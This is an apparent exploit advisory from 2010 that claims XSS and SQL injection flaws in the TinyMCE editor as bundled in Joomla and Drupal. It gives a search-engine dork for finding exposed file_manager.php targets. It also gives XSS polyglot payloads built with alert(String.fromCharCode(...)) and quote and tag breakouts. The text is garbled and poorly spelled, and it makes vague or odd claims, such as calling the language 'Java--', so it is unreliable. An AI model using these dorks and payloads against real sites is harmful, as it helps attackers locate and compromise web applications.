[+] Vurnerebility: *Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup *& SQl implemented [+] Language : Java--,Xml [+] lisences : LGPL [+] Vendor : Moxiecode Systems AB [+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02; [+] Category : bug report [+] vendor : http://tinymce.moxiecode.com/ [+] implemented : joomla componen,drupal.. [+] Author : mc2_s3lector //yogyacarderlink.web.id [+] dork : powered:powered by CMS : inurl"file_manager.php?type=img" [+] Contact : (00x0---www.yogyacarderlink.web.id [+]date : 4-2-10 [+] biGthank to : Allah,jasakom,KeDai Computerworks,all indonesian like a coding, ------------------------------------------------------------------------------------ --[Vulnerability sampling]-- ------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------- # alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\"; alert(String.fromCharCode(X1,X2,X3,x4))//-->">'> # ------------------------------------------------------------------------------------------------------------------------- # '';!--"=&{()}' ------------------------------------------------------------------------------------